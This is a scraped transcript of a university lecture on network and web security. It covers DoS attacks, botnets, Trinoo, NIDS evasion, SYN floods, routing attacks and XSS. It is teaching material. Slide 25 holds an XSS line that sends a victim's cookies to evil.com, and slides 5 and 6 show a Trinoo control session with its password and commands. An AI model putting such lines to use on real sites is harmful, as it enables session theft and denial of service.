Presentation is loading. Please wait.

Presentation is loading. Please wait.

Network & WebSecurity Dina Katabi nms.csail.mit.edu/~dina.

Published byEleanore Fields Modified over 8 years ago

Similar presentations

Presentation on theme: "Network & WebSecurity Dina Katabi nms.csail.mit.edu/~dina."— Presentation transcript:

1 Network & WebSecurity Dina Katabi dk@mit.edu nms.csail.mit.edu/~dina

2 Denial of Service Attack (DoS)  Goal: prevents legit access to an Internet service  Mechanism: Typically tries to congest the service or bring it down  Types: can target any resource, e.g., link bandwidth, routing system, access to database  Example: attacker transmits too many packets to congest the access link of the server causing legitimate connections to suffer excessive drops and timeout

3 BotNets  A Botnet is a large collection of compromised machines controlled by an attacker  Botnets can be used to mount distributed DoS or DDoS  Machines in a botnet are compromised via Internet worms, viruses, Trojans, etc.  One can rent a Botnet of $10K machines for about $200/day

4 A Botnet is typically organized in hierarchy Master Daemon Victim Unidirectional commands Attack traffic Coordinating communication Attacker Master Daemon

5 Specialized software is installed on the compromised machines, e.g., Trinoo Connection to port (default 27665/tcp) attacker$ telnet 10.0.0.1 27665 Trying 10.0.0.1 Connected to 10.0.0.1 Escape character is '^]'. Kwijibo Connection closed by foreign host.... attacker$ telnet 10.0.0.1 27665 Trying 10.0.0.1 Connected to 10.0.0.1 Escape character is '^]'. Betaalmostdone trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/] trinoo>

6 Trin00 Commands  dos - command to initiate a DoS against the targeted address  mdos - sends command to attack three IP addresses, sequentially  die – shut down the master  mdie - if correct password specified, packet is sent out to all daemon nodes to shutdown  mping – ping sent to all nodes in the deamon list  killdead – delete deamon nodes from list that didn’t reply to ping  bcast – gives a list of all active daemons  mstop – Attempts to stop an active DoS attack. Never implemented by the author(s), but the command is there

7 Detection Issues  Detecting What?  Detecting the offending packets  Some attack characteristics (e.g., how many zombies)  The occurrence of an attack  Offline vs. realtime  Realtime detection may help in throttling the attack while forensics might help in suing the attacker  Detection cost  Can attacker mount an attack on the detection mechanism? How would that affect the protected system?

8 Network Intrusion Detection  NIDS box monitors traffic entering and leaving your network  In contrast to firewalls, NIDS are passive XP Linux Win98 Linux Win95Mac NT

9 Approaches to Intrusion Detection 1. Signature Based: Keeps a DB of known attack signatures and matches traffic against DB (e.g., Bro, Snort)  Pros  Easy to understand the outcome  More accurate in detecting known attacks  Cons  Can’t discover new attacks 2. Anomaly Based: Matches traffic against a model of normal traffic and flags abnormalities (e.g., EMERALD)  Pros  Can deal with new attacks  Cons  Modeling normal. it is hard to describe what is normal  Limits new applications  Less accurate detection of known attacks 3. Hybrid: Matches against DB of known attacks. If no match, it checks for anomaly

10 Evasion Problem in NIDS  Consider scanning traffic for a particular string (“USER root”)  Easiest: scan for the text in each packet  No good: text might be split across multiple packets  Okay, remember text from previous packet  No good: out-of-order delivery  Okay, fully reassemble byte stream  Costs state ….  …. and still evadable Source: Vern Paxson

11 Evading Detection Via Ambiguous TCP Retransmission Sender Receiver NIDS 15 hops 20 hops

12 Evading Detection Via Ambiguous TCP Retransmission Attacker Receiver n r r NIDS n or r? TTL=17, seq=1 TTL=23, seq=1 Timed out

13 Evading Detection Via Ambiguous TCP Retransmission Attacker Receiver n r r NIDS n or r? i or o? TTL=17, seq=1 TTL=23, seq=1 o i o TTL=21, seq=2 TTL=15, seq=2 Timed out

14 Evading Detection Via Ambiguous TCP Retransmission Attacker Receiver n r r NIDS n or r? i or o? o c or t? TTL=17, seq=1 TTL=23, seq=1 o i o TTL=21, seq=2 TTL=15, seq=2 Timed out o c o TTL=20, seq=3 TTL=19, seq=4 Timed out t t TTL=27, seq=4 noot? niot? rooc? nooc? nioc? riot? root? …

15 TCP SYN Flood TCP DoS Attacks: Client Server SYN C SYN S, ACK C ACK S Listening Store data Wait Connected

16 TCP SYN Flood TCP DoS Attacks: C S SYN C1 Listening Store data SYN C2 SYN C3 SYN C4 SYN C5

17 TCP SYN Flood  Usually targets connection memory  Too many half-open connections  Potential victim is any TCP-based server such as a Web server, FTP server, or mail server  How can the server deal with it?  Server times out half-open connection TCP DoS Attacks:

18 Routing Protocols Attacks on Routers: X Z Y B A Routing Info X  A, Cost 1 Y  X  A, Cost 2 Z  X  A, Cost 2 B  Y  X  A, Cost 3

19 Attacks on Routing Table  Attacker needs to get access to a router  Attacks  Prefix hijacking by announcing a more desirable route  Z can lie about its route to A  Overload routers CPU by too many routing churns  Overload the routing table with too many routes  Causes router to run out of memory or CPU power for processing routes  E.g., AS7007 Attacks on Routers: X Z Y B A Routing Info Y  Z  A, Cost 2 Z  A, Cost 1 B  Y  Z  A, Cost 3

20 Countering Routing Table Attacks  Authenticate peer routers  Secure BGP [Kent et al]  Every ISP sign their advertisements creating a chain of accountability (e.g., Y sends { X: {A} X } Y  Too many signatures  too slow  With no authentication needs a few usec; authentication needs 2 orders of magnitude more time Attacks on Routers:

21 DoS Attacks on Web Servers

22 Attacks that Mimic Legitimate Traffic  Attacker compromises many machines causing them to flood victim with HTTP requests  Attacked resources  DB and Disk bandwidth  Socket buffers, processes, …  Dynamic content, password checking, etc.  Hard to detect; attack traffic is indistinguishable from legitimate traffic DoS Attacks on Servers: GET LargeFile.zip DO LongDBQuery

23 CAPTCH-Based Solution Suspected attack! To access www.foo.com enter the above letters:  Need to ensure:  Cheap ways to send test and check answer  Some people can’t or don’t want to answer graphical tests but are legitimate users (e.g., Blind users)

24 Web Attacks  Most web attacks exploit java scripts  Java scripts can appear in a web page as  executable instructions  The instructions between instructions do not appear on the web page; they get executed by the browser  If the instructions are malicious they can do a lot of harm to the client, e.g., steal web cookies  Cross-site scripting are one of the most common attack on web browsers

25 Cross-Site Scripting (XSS)  Say you have a trusted web server that accepts entries from users,  e.g.,TrustedBlog.com has a box for users to enter comments on prior blogs  Attacker can embed an executable script in his comment like:  document.location = 'http://evil.com/blah.cgi?cookie=' + document.cookie;  When a user browse the trusted server, the server sends the comments and the victim’s browser executes the script sending the victim’s cookie to the attacker’s site

Download ppt "Network & WebSecurity Dina Katabi nms.csail.mit.edu/~dina."

Similar presentations

Network and Application Attacks Contributed by- Chandra Prakash Suryawanshi CISSP, CEH, SANS-GSEC, CISA, ISO 27001LI, BS 25999LA, ERM (ISB) June 2006.

Network and Application Attacks Contributed by- Chandra Prakash Suryawanshi CISSP, CEH, SANS-GSEC, CISA, ISO 27001LI, BS 25999LA, ERM (ISB) June 2006.
Review For Exam 2 March 9, 2010 MIS 4600 – MBA 5880 - © Abdou Illia.

Review For Exam 2 March 9, 2010 MIS 4600 – MBA © Abdou Illia.
Denial of Service & Session Hijacking.  Rendering a system unusable to those who deserve it  Consume bandwidth or disk space  Overwhelming amount of.

Denial of Service & Session Hijacking.  Rendering a system unusable to those who deserve it  Consume bandwidth or disk space  Overwhelming amount of.
Lecture 9 Page 1 CS 236 Online Denial of Service Attacks that prevent legitimate users from doing their work By flooding the network Or corrupting routing.

Lecture 9 Page 1 CS 236 Online Denial of Service Attacks that prevent legitimate users from doing their work By flooding the network Or corrupting routing.
1 Topic 1 – Lesson 3 Network Attacks Summary. 2 Questions ► Compare passive attacks and active attacks ► How do packet sniffers work? How to mitigate?

1 Topic 1 – Lesson 3 Network Attacks Summary. 2 Questions ► Compare passive attacks and active attacks ► How do packet sniffers work? How to mitigate?
Security (Continued) V.T. Raja, Ph.D., Oregon State University.

Security (Continued) V.T. Raja, Ph.D., Oregon State University.
Hacking Presented By :KUMAR ANAND SINGH 04-243,ETC/2008.

Hacking Presented By :KUMAR ANAND SINGH ,ETC/2008.
Firewalls and Intrusion Detection Systems

Firewalls and Intrusion Detection Systems
Outline Definition Point-to-point network denial of service

Outline Definition Point-to-point network denial of service
Network & Computer Attacks (Part 2) February 11, 2010 MIS 4600 – MBA 5880 - © Abdou Illia.

Network & Computer Attacks (Part 2) February 11, 2010 MIS 4600 – MBA © Abdou Illia.
Beyond the perimeter: the need for early detection of Denial of Service Attacks John Haggerty,Qi Shi,Madjid Merabti Presented by Abhijit Pandey.

Beyond the perimeter: the need for early detection of Denial of Service Attacks John Haggerty,Qi Shi,Madjid Merabti Presented by Abhijit Pandey.
© 2006 Cisco Systems, Inc. All rights reserved. Implementing Secure Converged Wide Area Networks (ISCW) Module 6: Cisco IOS Threat Defense Features.

© 2006 Cisco Systems, Inc. All rights reserved. Implementing Secure Converged Wide Area Networks (ISCW) Module 6: Cisco IOS Threat Defense Features.
UNCLASSIFIED Secure Indirect Routing and An Autonomous Enterprise Intrusion Defense System Applied to Mobile ad hoc Networks J. Leland Langston, Raytheon.

UNCLASSIFIED Secure Indirect Routing and An Autonomous Enterprise Intrusion Defense System Applied to Mobile ad hoc Networks J. Leland Langston, Raytheon.
Review for Exam 4 School of Business Eastern Illinois University © Abdou Illia, Fall 2006.

Review for Exam 4 School of Business Eastern Illinois University © Abdou Illia, Fall 2006.
Network Security. Network security starts from authenticating any user. Once authenticated, firewall enforces access policies such as what services are.

Network Security. Network security starts from authenticating any user. Once authenticated, firewall enforces access policies such as what services are.
Privacy - not readable Permanent - not alterable (can't edit, delete) Reliable - (changes detectable) But the data must be accessible to persons authorized.

Privacy - not readable Permanent - not alterable (can't edit, delete) Reliable - (changes detectable) But the data must be accessible to persons authorized.
1 CCNA 2 v3.1 Module 10. 2 Intermediate TCP/IP CCNA 2 Module 10.

1 CCNA 2 v3.1 Module Intermediate TCP/IP CCNA 2 Module 10.
TCP. Learning objectives Reliable Transport in TCP TCP flow and Congestion Control.

TCP. Learning objectives Reliable Transport in TCP TCP flow and Congestion Control.
Web server security Dr Jim Briggs WEBP security1.

Web server security Dr Jim Briggs WEBP security1.
Computer Security: Principles and Practice EECS710: Information Security Professor Hossein Saiedian Fall 2014 Chapter 7: Denial-of-Service Attacks.

Computer Security: Principles and Practice EECS710: Information Security Professor Hossein Saiedian Fall 2014 Chapter 7: Denial-of-Service Attacks.

Similar presentations

Ads by Google